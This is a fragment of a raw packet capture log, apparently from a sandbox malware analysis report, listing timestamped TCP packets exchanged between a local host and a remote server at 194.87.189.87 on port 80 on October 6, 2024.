                                                                                                                                    Oct 6, 2024 21:27:37.970238924 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.970277071 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.970293045 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.972764015 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.972774982 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.972785950 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.972840071 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.975949049 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.975997925 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.976007938 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.976018906 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.976047993 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.979178905 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.979228973 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.979238987 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.979279995 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.982197046 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.982233047 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.982242107 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.982274055 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.982299089 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.984961987 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.984980106 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.984989882 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.985044003 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.988235950 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.988277912 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.988279104 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.988289118 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.988322020 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.990995884 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.991020918 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.991030931 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.991061926 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.993989944 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.994013071 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.994021893 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.994043112 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.994062901 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:37.996958971 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.997021914 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.997031927 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:37.997070074 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.001096010 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.001152992 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.001213074 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.001224041 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.001252890 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.002898932 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.002922058 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.002932072 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.002974033 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.006447077 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.006457090 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.006468058 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.006500006 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.008091927 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.008910894 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.008934975 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.008944988 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.008980036 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.012320995 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.012356043 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.012366056 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.012403965 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.012681961 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.015005112 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.015047073 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.015057087 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.015109062 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.018306017 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.018331051 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.018340111 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.018383026 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.018405914 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.021030903 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.021066904 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.021075964 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.021110058 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.025645018 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.025657892 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.025669098 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.025703907 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.025716066 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.027187109 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.027232885 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.027241945 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.027292013 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.030251026 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.030261993 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.030272961 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.030302048 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.030314922 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.032723904 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.032742023 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.032753944 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.032825947 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.035516024 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.035559893 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.035569906 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.035619974 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.035641909 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.038259029 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.038276911 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.038324118 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.038367033 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.041690111 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.041757107 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.041830063 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.041840076 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.041877985 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.044018030 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.044049978 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.044060946 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.044116020 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.046679020 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.046693087 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.046700954 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.046755075 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.046766043 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.049007893 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.049029112 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.049037933 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.049088955 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.052498102 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.052515984 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.052526951 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.052556038 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.052588940 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.055586100 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.055609941 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.055619001 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.055665016 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.058947086 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.058981895 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.059014082 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.059017897 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.059058905 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.060625076 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.060684919 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.060714960 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.060734034 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.062609911 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.062644005 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.062658072 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.062679052 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.063215971 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.064704895 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.064764977 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.064794064 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.064832926 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.066530943 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.066587925 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.066592932 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.066617012 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.068103075 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.068203926 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.068237066 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.068259954 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.068283081 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.070075035 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.070086956 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.070099115 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.070111990 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.070132971 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.071280956 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.071399927 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.071412086 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.071448088 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.072726011 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.072762012 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.072766066 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.072777033 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.072822094 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.073995113 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.074007034 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.074017048 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.074039936 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.075078011 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.075090885 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.075102091 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.075136900 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.075165987 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.077054977 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.077119112 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.077128887 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.077172041 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.078372955 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.078383923 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.078396082 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.078421116 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.078457117 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.080024958 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.080035925 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.080049038 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.080074072 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.082540989 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.082551956 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.082564116 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.082628965 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.083514929 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.083525896 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.083538055 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.083558083 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.084831953 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.084842920 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.084853888 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.084892035 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.084928036 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.086502075 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.086514950 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.086527109 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.086549997 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.087713003 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.087754011 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.087764025 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.087773085 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.087793112 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.089051962 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.089063883 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.089076996 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.089415073 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.090584040 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.090603113 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.090615034 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.090653896 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.090684891 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.091955900 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.091968060 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.091980934 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.092005968 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.093401909 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.093415976 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.093429089 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.093450069 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.093498945 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.094836950 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.094851017 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.094863892 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.094892979 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.096115112 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.096137047 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.096147060 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.096159935 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.096195936 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.097691059 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.097702980 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.097716093 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.097758055 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.099004030 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.099087000 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.099102974 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.099144936 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.099179983 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.100418091 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.100472927 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.100490093 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.100523949 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.101843119 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.101861000 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.101880074 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.101883888 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.102094889 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.103137970 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.103159904 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.103179932 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.103205919 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.104373932 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.104422092 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.104430914 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.104440928 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.104489088 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.106111050 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.106129885 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.106152058 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.106204987 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.106949091 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.106969118 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.106987000 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.107006073 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.107023001 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.108315945 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.108336926 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.108356953 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.108382940 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.109930992 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.109947920 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.109961033 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.109980106 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.110013008 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.110965014 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.111031055 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.111042976 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.111098051 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.112164974 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.112179041 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.112190962 CEST8049746194.87.189.87192.168.2.8
                                                                                                                                    Oct 6, 2024 21:27:38.112201929 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.112229109 CEST4974680192.168.2.8194.87.189.87
                                                                                                                                    Oct 6, 2024 21:27:38.113451004 CEST8049746194.87.189.87192.168.2.8
